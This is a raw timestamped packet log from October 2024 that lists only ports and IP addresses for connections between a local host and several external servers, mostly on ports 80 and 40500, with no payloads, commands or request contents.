Oct 26, 2024 07:26:43.792372942 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.792716026 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.792727947 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.792740107 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.792749882 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.792762041 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.792800903 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.793206930 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.793219090 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.793231010 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.793267012 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.793301105 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.793399096 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.793415070 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.793437958 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.793462038 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.794254065 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.794266939 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.794276953 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.794291019 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.794301987 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.794310093 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.794353962 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.795280933 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.795361996 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.797077894 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.797105074 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:43.797128916 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:43.797158003 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.169867992 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.169888020 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.169925928 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.169943094 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.169946909 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.169956923 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.169975996 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.169982910 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.169982910 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.169992924 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.169997931 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170021057 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170041084 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170047045 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170062065 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170078039 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170094967 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170104027 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170115948 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170145035 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170165062 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170192003 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170206070 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170219898 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170236111 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170250893 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170258999 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170259953 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170258999 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170278072 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170279026 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170295954 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170310020 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170353889 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170454025 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170469999 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170485973 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170502901 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170511007 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170520067 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170530081 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170540094 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170556068 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170563936 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170571089 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170594931 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170599937 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170610905 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170619965 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170628071 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170643091 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170650959 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170666933 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170681953 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170682907 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170696974 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170711994 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170716047 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170727968 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170743942 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170752048 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170761108 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170778036 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170778990 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170789003 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170794964 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170811892 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170819044 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170826912 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170842886 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170857906 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170859098 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170876026 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170877934 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170893908 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.170905113 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170928001 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.170962095 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.171055079 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.171096087 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.171123981 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.171159983 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.177126884 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.177158117 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.177172899 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.177205086 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.177232027 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.177237988 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.177282095 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.177295923 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.177310944 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.177329063 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.177335978 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.177357912 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.177357912 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.177376986 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.177376986 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.177393913 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.177393913 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.177413940 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.177421093 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.177437067 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.177439928 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.177459955 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.177470922 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.178069115 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.178092003 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:44.178109884 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.178123951 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:44.743026972 CEST	40500	49816	94.230.237.65	192.168.2.7
Oct 26, 2024 07:26:44.792751074 CEST	49816	40500	192.168.2.7	94.230.237.65
Oct 26, 2024 07:26:44.951889038 CEST	40500	49816	94.230.237.65	192.168.2.7
Oct 26, 2024 07:26:44.995872021 CEST	49816	40500	192.168.2.7	94.230.237.65
Oct 26, 2024 07:26:45.026511908 CEST	49816	40500	192.168.2.7	94.230.237.65
Oct 26, 2024 07:26:45.031968117 CEST	40500	49816	94.230.237.65	192.168.2.7
Oct 26, 2024 07:26:45.032779932 CEST	49816	40500	192.168.2.7	94.230.237.65
Oct 26, 2024 07:26:45.038011074 CEST	40500	49816	94.230.237.65	192.168.2.7
Oct 26, 2024 07:26:45.061098099 CEST	49816	40500	192.168.2.7	94.230.237.65
Oct 26, 2024 07:26:45.066375971 CEST	40500	49816	94.230.237.65	192.168.2.7
Oct 26, 2024 07:26:45.066431046 CEST	49816	40500	192.168.2.7	94.230.237.65
Oct 26, 2024 07:26:45.071657896 CEST	40500	49816	94.230.237.65	192.168.2.7
Oct 26, 2024 07:26:50.497570992 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:50.502984047 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:50.871736050 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:50.871790886 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:50.871840000 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:50.871844053 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:50.871874094 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:50.871886015 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:50.871886015 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:50.871901035 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:50.871927977 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:50.871936083 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:50.871937990 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:50.871978045 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:50.872037888 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:50.872085094 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:50.872134924 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:50.872169971 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:50.872196913 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:50.872217894 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:50.872246981 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:50.872288942 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:50.940574884 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:50.940597057 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:50.946687937 CEST	80	49810	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:50.946738005 CEST	49810	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:51.950423956 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:51.955996990 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:51.956129074 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:51.956298113 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:51.961571932 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:52.901173115 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:52.901261091 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:52.901271105 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:52.901284933 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:52.901299000 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:52.901312113 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:52.901324034 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:52.901421070 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:52.901433945 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:52.901446104 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:52.901456118 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:52.901473999 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:52.901473999 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:52.901473999 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:52.901473999 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:52.901498079 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:55.074140072 CEST	49816	40500	192.168.2.7	94.230.237.65
Oct 26, 2024 07:26:55.091671944 CEST	40500	49816	94.230.237.65	192.168.2.7
Oct 26, 2024 07:26:55.091763973 CEST	49816	40500	192.168.2.7	94.230.237.65
Oct 26, 2024 07:26:59.044538975 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:59.049891949 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:59.325740099 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:59.325766087 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:59.325778008 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:59.325790882 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:59.325870037 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:59.325901985 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:59.326054096 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:59.326069117 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:59.326080084 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:59.326098919 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:59.326122999 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:59.326131105 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:59.326138973 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:59.326164007 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:59.326191902 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:59.326769114 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:59.326813936 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:59.327081919 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:59.327095032 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:59.327111959 CEST	80	49857	185.215.113.66	192.168.2.7
Oct 26, 2024 07:26:59.327136993 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:26:59.327169895 CEST	49857	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:00.096977949 CEST	49905	40500	192.168.2.7	178.71.163.141
Oct 26, 2024 07:27:00.102294922 CEST	40500	49905	178.71.163.141	192.168.2.7
Oct 26, 2024 07:27:00.102370977 CEST	49905	40500	192.168.2.7	178.71.163.141
Oct 26, 2024 07:27:00.103894949 CEST	49905	40500	192.168.2.7	178.71.163.141
Oct 26, 2024 07:27:00.109191895 CEST	40500	49905	178.71.163.141	192.168.2.7
Oct 26, 2024 07:27:00.109252930 CEST	49905	40500	192.168.2.7	178.71.163.141
Oct 26, 2024 07:27:00.114615917 CEST	40500	49905	178.71.163.141	192.168.2.7
Oct 26, 2024 07:27:00.340848923 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:00.346250057 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:00.346339941 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:00.346452951 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:00.351967096 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.277582884 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.277604103 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.277623892 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.277637005 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.277648926 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.277687073 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:01.277719975 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:01.277734041 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.277745962 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.277756929 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.277775049 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:01.277780056 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.277798891 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:01.277801991 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.277848005 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:01.278590918 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:01.283193111 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.283253908 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:01.415596008 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.415623903 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.415635109 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.415671110 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:01.415695906 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:01.415781021 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:01.415828943 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:02.897423983 CEST	40500	49905	178.71.163.141	192.168.2.7
Oct 26, 2024 07:27:02.897536993 CEST	49905	40500	192.168.2.7	178.71.163.141
Oct 26, 2024 07:27:07.544261932 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:07.549592972 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:07.823899031 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:07.823960066 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:07.823962927 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:07.823975086 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:07.823987961 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:07.823999882 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:07.824001074 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:07.824027061 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:07.824063063 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:07.824323893 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:07.824368954 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:07.824382067 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:07.824398994 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:07.824407101 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:07.824418068 CEST	80	49906	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:07.824435949 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:07.824435949 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:07.824453115 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:07.824453115 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:07.824862003 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:07.824888945 CEST	49906	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:08.893143892 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:08.996881962 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:08.996982098 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:09.032888889 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:09.038384914 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:09.900744915 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:09.900803089 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:09.900851011 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:09.900854111 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:09.900851011 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:09.900887966 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:09.900911093 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:09.900924921 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:09.900937080 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:09.900959015 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:09.900993109 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:09.900993109 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:09.901016951 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:09.901027918 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:09.901034117 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:09.901063919 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:09.901072025 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:09.901109934 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:10.105701923 CEST	49905	40500	192.168.2.7	178.71.163.141
Oct 26, 2024 07:27:10.111068010 CEST	40500	49905	178.71.163.141	192.168.2.7
Oct 26, 2024 07:27:15.032027006 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:15.037429094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:15.037534952 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:15.037730932 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:15.042968035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:15.106654882 CEST	49983	40500	192.168.2.7	213.230.124.7
Oct 26, 2024 07:27:15.112005949 CEST	40500	49983	213.230.124.7	192.168.2.7
Oct 26, 2024 07:27:15.112087011 CEST	49983	40500	192.168.2.7	213.230.124.7
Oct 26, 2024 07:27:15.113930941 CEST	49983	40500	192.168.2.7	213.230.124.7
Oct 26, 2024 07:27:15.119581938 CEST	40500	49983	213.230.124.7	192.168.2.7
Oct 26, 2024 07:27:15.119663954 CEST	49983	40500	192.168.2.7	213.230.124.7
Oct 26, 2024 07:27:15.125133038 CEST	40500	49983	213.230.124.7	192.168.2.7
Oct 26, 2024 07:27:15.959039927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:15.959095955 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:15.959104061 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:15.959104061 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:15.959120989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:15.959125996 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:15.959148884 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:15.959163904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:15.959168911 CEST	49982	80	192.168.2.7	185.215.113.84
